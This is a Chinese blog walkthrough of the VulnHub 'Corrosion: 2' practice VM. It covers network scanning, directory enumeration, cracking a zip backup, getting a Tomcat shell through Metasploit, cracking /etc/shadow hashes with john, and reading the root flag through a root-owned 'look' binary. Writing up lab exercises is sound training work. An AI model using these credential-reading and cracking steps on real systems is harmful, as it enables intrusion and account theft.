VulnHUb日记(十四): Corrosion:2

最新推荐文章于 2024-01-10 21:47:32 发布
最新推荐文章于 2024-01-10 21:47:32 发布
阅读量440 收藏
点赞数
分类专栏: VlunHub日记 文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/121518184
版权

参考链接

Vulnhub:Corrosion:2
参考博客

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.135

fping 192.168.56.0/24

在这里插入图片描述
nmap 扫描主机

nap-A -v -p- 192.168.56.135

在这里插入图片描述
开启了80和8080两个http服务,分别访问
gobuster 枚举目录,在8080端口目录下

gobuster dir --url 192.168.56.135:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,tar,php,zip,bak,html

在这里插入图片描述
readme.txt
在这里得到图片描述
backup.zip
在这里插入图片描述
zip文件需要密码,尝试fcrackzip破解,zip2john很慢
在这里插入图片描述
解压backuo.zip,查看文件,获取tomcat管理员账号密码
在这里插入图片描述
msf 获取webshell

msfconsole
search tomcat 
use 6 
set .......
run

在这里插入图片描述

shell

在这里插入图片描述
randy目录下拿到userFlag
在这里插入图片描述
在这里插入图片描述
note.txt ,写到变更了randy的权限,使其不能在其根目录下删除或创建文件
在这里插入图片描述
msfshell可以看/etc/passwd和/etc/shadow,于是用john尝试爆破,获得了jaye的密码

#在msfshell中
cat /etc/passwd
cat /etc/shadow
#复制两个文件内容,保存到本地  passwd.txt 和shadow.txt
unshaow ./passwd.txt ./shadow.txt > pass.txt
john john --wordlist=/usr/share/wordlists/rockyou.txt ./pass.txt

在这里插入图片描述

在这里插入图片描述
jaye目录下的/Files/look文件属主是root可以直接查看root下文件,所以直接拿到了rootFLAG

look '' /root/root.txt

在这里插入图片描述

但是在参考博客中提到的使用Randy目录下randombase64.py和python提权由于没有看懂于是没能实现,于是没有成功提权,如果有哪位师傅可以解惑请留言评论区,提前感谢

Dawn_Xiiii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3104
vulnhub靶场——CORROSION:2 Wirteup
Corrosion2 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-31 844
Corrosion2 靶场渗透记录~ 提权太难懂~~~~~~
Corrosion_2
追求卓越,技术流~
01-19 3755
这里写自定义目录标题靶场环境信息收集漏洞利用权力提升总结 靶场环境 攻击机:Kali IP:192.168.247.129 靶机:Corrosion_2 IP:192.168.247.137 信息收集 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 07:56 EST Nmap scan report for 192.168.247.137 Host is up (0.00078s latency). Not shown: 65532 clos
Vulnhub靶场 Corrosion: 2靶机 渗透练习一
weixin_52244898的博客
07-07 995
前期准备: 靶机地址:Corrosion: 2 ~ VulnHub kali攻击机ip:192.168.122.128 靶机地址:192.168.122.143 一、信息收集 1.使用 netdiscover 探测目标 ip 2.使用 nmap 对目标靶机进行端口扫描 发现开放了22端口(ssh)、80端口(http)和8080端口(http) 3. 80 端口 访问 80 端口: 很正常的一个页面,没发现什么可利用信息 扫描一下目........
Corrosion2靶机wp
m0_52496313的博客
08-24 515
Corrosion2靶机wp
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
Corrosion:使用机器学习预测腐蚀速率
05-10
"Corrosion: 使用机器学习预测腐蚀速率"这个项目聚焦于利用这种技术来解决材料腐蚀的问题,这是工程领域的一大挑战。腐蚀会降低设备的寿命,增加维护成本,因此准确预测腐蚀速率对于预防性维护和设计更耐腐蚀的材料...
corrosion:用于Rust的高性能缓存库
03-05
2. **主要数据结构** - **HashMap缓存**:基于哈希映射的数据结构,提供键值对的快速查找和存储。 - **LinkedList缓存**:用于实现LRU策略,按访问顺序排列缓存项,最近最少使用的项会被优先移除。 3. **API使用...
corrosion:一组用于Rust的测试实用程序
05-13
2. **测试覆盖率**:虽然Rust标准库不直接提供覆盖率工具,但corrosion可能集成了第三方库,帮助开发者测量代码覆盖率,从而了解测试的全面性。 3. **模拟和依赖注入**:在复杂的系统中,测试往往需要隔离和控制...
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
Vulnhub靶机:Corrosion 2
最新发布
qq_48904485的博客
01-10 910
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
vulnhub-Corrosion: 2
qq_43006864的博客
05-12 502
Corrosion: 2 ~ VulnHub 靶机:Corrosion: 2 ~ VulnHub 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap -sS -sV -A -p- 192.168.1.108 主机开放了三个端口。 访问一下80和8080 分别是Apache和Tomcat中间件的界面。没啥发现,开始目.
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 635
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
[渗透测试学习靶机04] vulnhub靶场 Corrosion: 2
weixin_47112073的博客
10-17 591
渗透测试学习靶机04-vulnhub靶场 Corrosion: 2本次靶机难度:中等。
Corrosion2( 侵蚀)靶机
m0_66299232的博客
10-02 564
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码。sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64。2.gzip -d rockyou.txt.gz //解压字典里的密码文件。虚拟机网络链接模式:桥接模式。将文件下载下来进行解压!
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2377
Vulnhub-DC-4靶机实战
靶机渗透练习37-Corrosion2
hirak0的博客
04-18 944
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-2,745/ Description Difficulty: Medium Hint: Enumeration is key. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.147 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和K
OSCP-1-4-dawn2(windows缓存区溢出)
墨痕诉清风的博客
07-17 356
代码】OSCP-1-4-dawn2(windows缓存区溢出)
vulnhub之dawn
weixin_54431413的博客
07-08 1153
smb配合定时任务漏洞利用
PCB基础知识详解:关键术语与工艺
2. Ablation:指通过激光或切割等方式去除材料的过程。 3. Abrasion resistance:耐磨性,衡量材料表面抵抗磨损的能力。 4. Absorption:在PCB制造中,指的是材料对光线、化学物质或其他能量的吸收能力。 5. ACC ...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值